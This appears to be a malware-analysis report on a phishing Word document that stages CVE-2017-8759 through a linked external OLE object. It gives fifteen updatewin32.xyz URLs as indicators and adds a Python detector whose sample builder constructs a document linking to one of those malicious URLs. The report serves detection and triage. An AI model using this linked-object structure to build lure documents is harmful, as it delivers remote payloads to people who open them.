Verdict: MALICIOUS (Risk Score: 82)

Malware Insights

MITRE ATT&CK
- T1203 Exploitation for Client Execution
- T1566.001 Spearphishing Attachment
The sample is an OOXML (Word) document containing an o:OLEObject of Type=Link whose oleObject relationship points to an external HTTP(S) URL: the document does not carry its payload, it tries to pull a second-stage document from a remote server. A heuristic for CVE-2017-8759 also fires. That vulnerability is a code-injection flaw in the .NET Framework's WSDL/SOAP parser, not in Office itself; Office documents are the delivery vehicle, and this linked-OLE-object shape is how the in-the-wild campaigns handed Office a remote SOAP moniker/WSDL that reached the vulnerable parser. Because the WSDL body lives on the remote side, the local file supports a staging-shape match only, not a confirmed exploit. The fifteen embedded updatewin32.xyz URLs (1.doc through 15.doc) are the candidate locations of that remote stage.
Heuristics (3)

- OOXML OLE2Link remote document (CVE-2017-8759 related) [high] CVE_2017_8759_RELATED
  Document contains an o:OLEObject Type=Link whose external oleObject relationship fetches a remote Office-looking document. That is the OOXML OLE2Link staging shape used by CVE-2017-8759 campaigns, where the remote document/WSDL supplies the SOAP moniker payload; the local file alone does not contain the WSDL body needed for an exact match, so this rule reports the staging shape, not the exploit itself.

- External OLE object relationship [high] OOXML_EXTERNAL_OLE_OBJECT
  Document contains an oleObject relationship whose target is an external HTTP(S) URL. Office resolves this through its OLE/object link-update paths rather than as a user-clicked hyperlink, so the fetch is driven by link updating (which can happen on open) rather than by anything the reader chooses to click.

- Embedded URL [info] EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Every URL below carries the same label, "In document text (OOXML body / shared strings)".

  Network indicators: fifteen remote .doc URLs on one host, listed here in numeric order.
  - https://updatewin32.xyz/microsoft/1.doc
  - https://updatewin32.xyz/microsoft/2.doc
  - https://updatewin32.xyz/microsoft/3.doc
  - https://updatewin32.xyz/microsoft/4.doc
  - https://updatewin32.xyz/microsoft/5.doc
  - https://updatewin32.xyz/microsoft/6.doc
  - https://updatewin32.xyz/microsoft/7.doc
  - https://updatewin32.xyz/microsoft/8.doc
  - https://updatewin32.xyz/microsoft/9.doc
  - https://updatewin32.xyz/microsoft/10.doc
  - https://updatewin32.xyz/microsoft/11.doc
  - https://updatewin32.xyz/microsoft/12.doc
  - https://updatewin32.xyz/microsoft/13.doc
  - https://updatewin32.xyz/microsoft/14.doc
  - https://updatewin32.xyz/microsoft/15.doc

  The remaining extracted strings are XML namespace URIs (OOXML and Microsoft Office schema identifiers) that every recent Word document declares. Office never fetches them and they are not indicators; they are kept only because the extractor reported them.
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
  - http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.microsoft.com/office/drawing/2016/ink
  - http://schemas.microsoft.com/office/drawing/2017/model3d
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2018/wordml/cex
  - http://schemas.microsoft.com/office/word/2016/wordml/cid
  - http://schemas.microsoft.com/office/word/2018/wordml
  - http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
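The two high-severity heuristics above describe a package-level shape: an oleObject relationship with TargetMode="External", referenced from an o:OLEObject with Type="Link". The script below is an added example, written for this page and not taken from the analyzer or from the sample, that detects that shape with the standard library only. It walks every .rels part in a Word package (so header and footer parts are covered too), keeps oleObject relationships whose target is external, and joins each with the OLEObject that references it (Type, ProgID, UpdateMode) and with the EMF placeholder picture its v:shape points at. The package produced by make_sample_docx() is constructed for the demonstration: the external URL is one of the fifteen from the report, while the rIds, ProgIDs and shape ids are assumptions. It contains an internal embedded OLE object and a plain hyperlink as negative cases, and only the linked external object is reported.

```python
"""Detector for the OOXML OLE2Link staging shape (added example; not analyzer code).
Walks every .rels part, keeps oleObject relationships with TargetMode="External" and
joins them with the o:OLEObject that references them and with its EMF placeholder.
make_sample_docx() is a constructed package: the URL comes from the report, the
rIds, ProgIDs and shape ids are assumptions made for this example."""
import io
import posixpath
import zipfile
import xml.etree.ElementTree as ET

NS_PKG = "http://schemas.openxmlformats.org/package/2006/relationships"
NS_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
NS_O = "urn:schemas-microsoft-com:office:office"
NS_V = "urn:schemas-microsoft-com:vml"
REL_OLE = NS_R + "/oleObject"


def _source_part(rels_name):
    """word/_rels/document.xml.rels -> word/document.xml ('' for the package root)."""
    folder, base = posixpath.split(rels_name)
    if posixpath.basename(folder) != "_rels" or not base.endswith(".rels"):
        return None
    return posixpath.join(posixpath.dirname(folder), base[: -len(".rels")])


def find_external_ole_links(docx_bytes):
    """Return one record per oleObject relationship whose target is an external URL."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        names = set(zf.namelist())
        for rels_name in sorted(n for n in names if n.endswith(".rels")):
            rels = {r.get("Id"): r for r in
                    ET.fromstring(zf.read(rels_name)).iter("{%s}Relationship" % NS_PKG)}
            external = {rid: r.get("Target") for rid, r in rels.items()
                        if r.get("Type") == REL_OLE
                        and r.get("TargetMode", "Internal") == "External"}
            if not external:
                continue
            # Join with the o:OLEObject / v:shape elements of the part that owns these rels.
            objects, shapes = {}, {}
            part = _source_part(rels_name)
            if part and part in names:
                root = ET.fromstring(zf.read(part))
                for ole in root.iter("{%s}OLEObject" % NS_O):
                    objects[ole.get("{%s}id" % NS_R)] = ole
                for shape in root.iter("{%s}shape" % NS_V):
                    img = shape.find("{%s}imagedata" % NS_V)
                    if img is not None:
                        shapes[shape.get("id")] = img.get("{%s}id" % NS_R)
            for rid, target in external.items():
                ole = objects.get(rid)
                attrs = dict(ole.attrib) if ole is not None else {}
                img_rel = rels.get(shapes.get(attrs.get("ShapeID")))
                hits.append({
                    "part": part or rels_name,
                    "rId": rid,
                    "target": target,
                    "ole_type": attrs.get("Type"),  # "Link" is the OLE2Link shape
                    "progid": attrs.get("ProgID"),
                    "update_mode": attrs.get("UpdateMode"),
                    "placeholder": img_rel.get("Target") if img_rel is not None else None,
                })
    return hits


def make_sample_docx():
    """Constructed minimal .docx: one linked external OLE object (the staging shape),
    one internal embedded OLE object and one ordinary hyperlink; only the first hits."""
    document_xml = (
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"'
        ' xmlns:r="%s" xmlns:o="%s" xmlns:v="%s"><w:body>'
        '<w:p><w:r><w:object><v:shape id="_x0000_i1025"><v:imagedata r:id="rId4"/></v:shape>'
        '<o:OLEObject Type="Link" ProgID="Word.Document.12" ShapeID="_x0000_i1025"'
        ' DrawAspect="Content" r:id="rId5" UpdateMode="Always"/></w:object></w:r></w:p>'
        '<w:p><w:r><w:object><v:shape id="_x0000_i1026"><v:imagedata r:id="rId4"/></v:shape>'
        '<o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1026" r:id="rId6"/>'
        '</w:object></w:r></w:p>'
        '<w:p><w:hyperlink r:id="rId7"><w:r><w:t>benign link</w:t></w:r></w:hyperlink></w:p>'
        '</w:body></w:document>' % (NS_R, NS_O, NS_V))

    def rel(rid, kind, target, external=False):
        mode = ' TargetMode="External"' if external else ""
        return '<Relationship Id="%s" Type="%s/%s" Target="%s"%s/>' % (
            rid, NS_R, kind, target, mode)
    doc_rels = '<Relationships xmlns="%s">%s</Relationships>' % (NS_PKG, "".join([
        rel("rId4", "image", "media/image2.emf"),
        rel("rId5", "oleObject", "https://updatewin32.xyz/microsoft/1.doc", external=True),
        rel("rId6", "oleObject", "embeddings/oleObject1.bin"),
        rel("rId7", "hyperlink", "https://example.com/", external=True)]))
    root_rels = '<Relationships xmlns="%s">%s</Relationships>' % (
        NS_PKG, rel("rId1", "officeDocument", "word/document.xml"))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("_rels/.rels", root_rels)
        zf.writestr("word/document.xml", document_xml)
        zf.writestr("word/_rels/document.xml.rels", doc_rels)
        zf.writestr("word/media/image2.emf", b"constructed EMF placeholder")
        zf.writestr("word/embeddings/oleObject1.bin", b"constructed OLE placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    for hit in find_external_ole_links(make_sample_docx()):
        print(hit)
```

To triage a real file, pass its bytes: find_external_ole_links(open("sample.docx", "rb").read()). A record with ole_type "Link" and an http(s) target is the shape both high-severity rules key on; update_mode "Always" means Word will attempt the fetch whenever it updates links, without a click. As the first heuristic says, this is evidence of staging only: whether the remote document carries a SOAP moniker/WSDL (CVE-2017-8759), some other OLE2Link abuse, or nothing at all can only be settled by retrieving and examining the remote stage in a controlled environment.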
Extracted artifacts (15)

Files carved from inside the sample during analysis. All fifteen are EMF image parts (word/media/image2.emf through image16.emf), near-identical in size (5812 or 5820 bytes) but with distinct hashes. Word stores an EMF of this kind as the on-page placeholder picture for an OLE object (the v:imagedata target), so fifteen placeholders alongside fifteen remote .doc URLs is consistent with one linked object per URL; the report itself does not map individual parts to URLs.

| Filename | Kind | Source (OOXML EMF part) | Size | SHA-256 |
|---|---|---|---|---|
| emf_00.emf | ooxml-emf | word/media/image2.emf | 5812 bytes | 6c60b1cc47b0f4235e6176940d1333018145d0ddead9375efbbdf821874c24b6 |
| emf_01.emf | ooxml-emf | word/media/image3.emf | 5812 bytes | 409890249b6de9967ac77560c242dab99bf602904a565bd831ff5e3860b61414 |
| emf_02.emf | ooxml-emf | word/media/image4.emf | 5812 bytes | b802d16f5cbfbab47df75b845ae2dd974fc5befc21ccd2244c9810e7cdc6c41a |
| emf_03.emf | ooxml-emf | word/media/image5.emf | 5812 bytes | 1ae00226a550104a43358b658ad21228e923c27d1f38514163ce936d52b5313c |
| emf_04.emf | ooxml-emf | word/media/image6.emf | 5812 bytes | b560c4963e22ca6d492c5d4b5f133cec41086f329ae3cfd6cbc832b47cf5d240 |
| emf_05.emf | ooxml-emf | word/media/image7.emf | 5812 bytes | 186f11ae41101fe4d2a44a15e36c45087a97a291bb4752297e2ce3d44bbca85f |
| emf_06.emf | ooxml-emf | word/media/image8.emf | 5812 bytes | 59888c0f9173bbe27552d144df00f881043810661b2d1799334358e7bc9393cb |
| emf_07.emf | ooxml-emf | word/media/image9.emf | 5812 bytes | 06af1bb9d63c1a39e6acc92dfa9cff42c27c940437015242cacfd15219831b57 |
| emf_08.emf | ooxml-emf | word/media/image10.emf | 5812 bytes | d57e92ce688b02264224dc44841328390a26ae8167358e3bc653991edc448463 |
| emf_09.emf | ooxml-emf | word/media/image11.emf | 5820 bytes | aa5e11ed31ad6938bb7951477ce36c99e6082362f9bb3a389633c0ce4f49e00a |
| emf_10.emf | ooxml-emf | word/media/image12.emf | 5820 bytes | d26858dcbdf5a96a83cd3c7f585dec32932d30fc9333812684256ec830d54e61 |
| emf_11.emf | ooxml-emf | word/media/image13.emf | 5820 bytes | 28f774ded68d0e6e9a9548f6a7e991260802ac448ada202603ce8c74f163efea |
| emf_12.emf | ooxml-emf | word/media/image14.emf | 5820 bytes | 7a36582358ccdd6ad6707e8c8555b506b06c17d2e9ac75685673cb9eda130b10 |
| emf_13.emf | ooxml-emf | word/media/image15.emf | 5820 bytes | 73920789bdeae4afbcafbfde0789db87e1aacd39b1be937bbe31d388e0ce8d85 |
| emf_14.emf | ooxml-emf | word/media/image16.emf | 5820 bytes | c0056f4c7d2501d4587968859a859fb7bc2796e89bcdae192577449bc6c30668 |